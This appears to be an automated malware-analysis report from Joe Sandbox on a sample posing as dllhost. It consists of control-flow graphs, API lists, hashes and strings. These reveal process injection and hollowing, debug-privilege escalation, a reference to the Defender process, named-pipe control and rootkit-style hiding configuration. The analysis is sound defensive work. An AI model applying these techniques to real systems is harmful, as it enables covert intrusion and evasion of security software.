                          • String ID: $cnt-dll32$$cnt-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$cnt-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                          • API String ID: 2725631067-3108054586
                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 66 140001cc8-140001ccb CloseHandle 62->66 67 140001a29-140001a2d 62->67 64 1400019b3-1400019bf CloseHandle 63->64 65 140001983-14000199e PathFindFileNameW lstrlenW 63->65 64->62 69 1400019c1-1400019db 64->69 65->64 68 1400019a0-1400019b0 StrCpyW 65->68 66->49 67->66 70 140001a33-140001a4b OpenProcessToken 67->70 68->64 71 1400019e0-1400019f2 StrCmpIW 69->71 70->66 72 140001a51-140001a77 GetTokenInformation 70->72 71->66 73 1400019f8-140001a02 71->73 74 140001af4 72->74 75 140001a79-140001a82 GetLastError 72->75 73->62 73->71 76 140001afb-140001b09 CloseHandle 74->76 75->74 77 140001a84-140001a98 LocalAlloc 75->77 76->66 78 140001b0f-140001b16 76->78 77->74 79 140001a9a-140001ac0 GetTokenInformation 77->79 78->66 80 140001b1c-140001b27 78->80 81 140001ae2 79->81 82 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 79->82 80->66 83 140001b2d-140001b37 80->83 84 140001ae9-140001af2 LocalFree 81->84 82->84 85 140001b52 83->85 86 140001b39-140001b43 83->86 84->76 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->66 87 140001b49-140001b50 86->87 87->88 88->66 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->66 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->66 105->66 106 140001c27-140001c40 WriteProcessMemory 105->106 106->66 107 140001c46-140001c68 call 140002bfc 106->107 107->66 110 140001c6a-140001c72 107->110 110->66 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->66 114->113 115->114
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                          • API String ID: 2456419452-2628171563
                          • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                          • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                          • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                          • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 167 140003204-140003225 168 14000322b 167->168 169 14000341d-140003423 167->169 170 140003231-140003237 168->170 171 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 168->171 172 140003599-1400035bd ReadFile 169->172 173 140003429-14000342c 169->173 174 140003382-140003384 ExitProcess 170->174 175 14000323d-140003240 170->175 176 140003652-140003664 171->176 180 1400033c9-1400033da 171->180 172->176 177 1400035c3-1400035ca 172->177 178 140003432-140003438 173->178 179 14000358f-140003594 call 140001f7c 173->179 182 140003246-140003249 175->182 183 1400032ea-140003315 RegOpenKeyExW 175->183 177->176 184 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 177->184 185 140003534-140003547 call 1400020fc 178->185 186 14000343e-140003441 178->186 179->176 180->176 187 1400033e0-140003409 call 140001868 * 2 180->187 189 1400032db-1400032e5 182->189 190 14000324f-140003252 182->190 195 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 183->195 196 140003317-14000334d RegDeleteValueW * 3 183->196 210 14000360d-140003613 184->210 211 14000363e-14000364c GetProcessHeap HeapFree 184->211 185->176 213 14000354d-14000355c call 1400020fc 185->213 192 140003443-140003449 186->192 193 140003480-140003491 call 1400020fc 186->193 215 14000340e-140003416 187->215 189->176 200 140003254-14000325a 190->200 201 1400032ce-1400032d6 190->201 192->176 203 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 192->203 193->176 214 140003497-1400034b9 ReadFile 193->214 195->176 196->195 200->176 209 140003260-140003284 ReadFile 200->209 201->176 209->176 217 14000328a-140003291 209->217 210->211 218 140003615-140003627 210->218 211->176 213->176 235 140003562-14000358a ShellExecuteW 213->235 214->176 221 1400034bf-1400034c6 214->221 215->187 222 140003418 215->222 217->176 224 140003297-1400032c9 call 140001868 * 2 217->224 225 140003629-14000362b 218->225 226 14000362d-140003635 218->226 221->176 229 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 221->229 222->176 224->176 225->226 232 140003639 call 140001eec 225->232 226->218 233 140003637 226->233 229->211 236 140003510-14000351c 229->236 232->211 233->211 235->176 236->211 240 140003522-14000352f call 140002434 236->240 240->211
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                          • String ID: $cnt-dll32$$cnt-dll64$$cnt-stager$$cnt-svc32$$cnt-svc64$SOFTWARE$open
                          • API String ID: 4225498131-603854293
                          • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                          • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                          • String ID:
                          • API String ID: 4084875642-0
                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                          • String ID:
                          • API String ID: 3197395349-0
                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 3993315683-2609720707
                          • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                          • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                          • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                          • String ID: .text$C:\Windows\System32\
                          • API String ID: 2721474350-832442975
                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                          • String ID: M$\\.\pipe\$cnt-childproc
                          • API String ID: 2203880229-3486825944
                          • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                          • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                          • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                          • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 294 140002cb0-140002cba 295 140002cbd-140002cd0 call 140002300 294->295 298 140002cd2-140002cdb Sleep 295->298 299 140002cdd-140002cea ConnectNamedPipe 295->299 298->295 300 140002d21-140002d26 Sleep 299->300 301 140002cec-140002d0d ReadFile 299->301 302 140002d2c-140002d35 DisconnectNamedPipe 300->302 301->302 303 140002d0f-140002d14 301->303 302->299 303->302 304 140002d16-140002d1d call 140003204 303->304 305 140002d1f 304->305 305->302
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                          • String ID: \\.\pipe\$cnt-control
                          • API String ID: 2071455217-1242848813
                          • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                          • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                          • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                          • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 315 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 316 1400036be-1400036d1 K32EnumProcesses 315->316 317 1400036d3-1400036e2 316->317 318 14000371b-140003724 SleepEx 316->318 319 1400036e4-1400036e8 317->319 320 14000370c-140003717 317->320 318->316 321 1400036ea 319->321 322 1400036fb-1400036fe call 1400031c4 319->322 320->318 323 1400036ee-1400036f3 321->323 326 140003702 322->326 324 1400036f5-1400036f9 323->324 325 140003706-14000370a 323->325 324->322 324->323 325->319 325->320 326->325
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                          • String ID:
                          • API String ID: 3676546796-0
                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                          • String ID:
                          • API String ID: 1323846700-0
                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 339 279a927f598-279a927f5b3 340 279a927f5b6-279a927f5df 339->340 341 279a927f5e1-279a927f5e6 340->341 342 279a927f5eb-279a927f5f4 340->342 343 279a927f676-279a927f67f 341->343 344 279a927f5f6-279a927f5f9 342->344 345 279a927f60c 342->345 343->340 346 279a927f685-279a927f69f 343->346 347 279a927f605-279a927f60a 344->347 348 279a927f5fb-279a927f603 344->348 349 279a927f611-279a927f622 GetStdHandle 345->349 347->349 348->349 350 279a927f651-279a927f669 349->350 351 279a927f624-279a927f62f GetFileType 349->351 350->343 352 279a927f66b-279a927f66f 350->352 351->350 353 279a927f631-279a927f63c 351->353 352->343 354 279a927f645-279a927f648 353->354 355 279a927f63e-279a927f643 353->355 354->343 356 279a927f64a-279a927f64f 354->356 355->343 356->343
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction ID: ccc3af4c3a5c1227648368b2324eb35d68d95760e921e9e96ecafc937749e508
                          • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction Fuzzy Hash: 6F31C32261DB6595EB608F2995882A93A50F345BB0F6A0309DF7E273F0CB35D4E1C340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 357 279a92af598-279a92af5b3 358 279a92af5b6-279a92af5df 357->358 359 279a92af5e1-279a92af5e6 358->359 360 279a92af5eb-279a92af5f4 358->360 361 279a92af676-279a92af67f 359->361 362 279a92af5f6-279a92af5f9 360->362 363 279a92af60c 360->363 361->358 365 279a92af685-279a92af69f 361->365 366 279a92af605-279a92af60a 362->366 367 279a92af5fb-279a92af603 362->367 364 279a92af611-279a92af622 GetStdHandle 363->364 368 279a92af624-279a92af62f GetFileType 364->368 369 279a92af651-279a92af669 364->369 366->364 367->364 368->369 370 279a92af631-279a92af63c 368->370 369->361 371 279a92af66b-279a92af66f 369->371 372 279a92af645-279a92af648 370->372 373 279a92af63e-279a92af643 370->373 371->361 372->361 374 279a92af64a-279a92af64f 372->374 373->361 374->361
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction ID: d32eeef765fc0ecfac449c0f0d38d7619557313e682b12b10438d63190e77709
                          • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction Fuzzy Hash: CC319323A1AB6499EB608F1595882A96B50F345FB0F6A0309DF7E477F0CB39D8E1D340
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction ID: 6bf068f77e8d8a8896a474b48b598099e98cf1c99c40d151a550765da96543d3
                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction Fuzzy Hash: 9A910672B267508BDB648F25D608B6DB391FB94BB8F568124DE4E4778CDE38D892C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 375 140002d38-140002d3c call 140002d4c 377 140002d41-140002d43 ExitProcess 375->377
                          APIs
                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                          • String ID:
                          • API String ID: 3805535264-0
                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                          • API String ID: 1036100660-1371749706
                          • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                          • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
